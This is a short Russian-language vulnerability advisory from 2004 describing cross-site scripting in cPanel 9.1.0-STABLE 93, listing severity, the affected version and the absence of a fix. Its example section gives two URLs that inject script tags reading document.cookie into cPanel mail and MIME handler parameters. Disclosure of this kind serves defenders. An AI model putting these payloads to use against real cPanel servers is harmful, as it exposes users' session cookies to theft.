Межсайтовый скриптинг в cPanel 9.1.0-STABLE 93

Дата публикации:
26.03.2004
Всего просмотров:
1102
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: cPanel 9.1.0-STABLE 93

Описание: Несколько уязвимостей обнаружено в cPanel. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]:2082/frontend/x/mail/dodelautores.html?email=<script>alert(document.c ookie)</script>
http://[target]:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=<script>alert(document.cookie</script>

URL производителя: http://www.cpanel.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: More Cpanel Vuls (cross site scripting)

или введите имя

CAPTCHA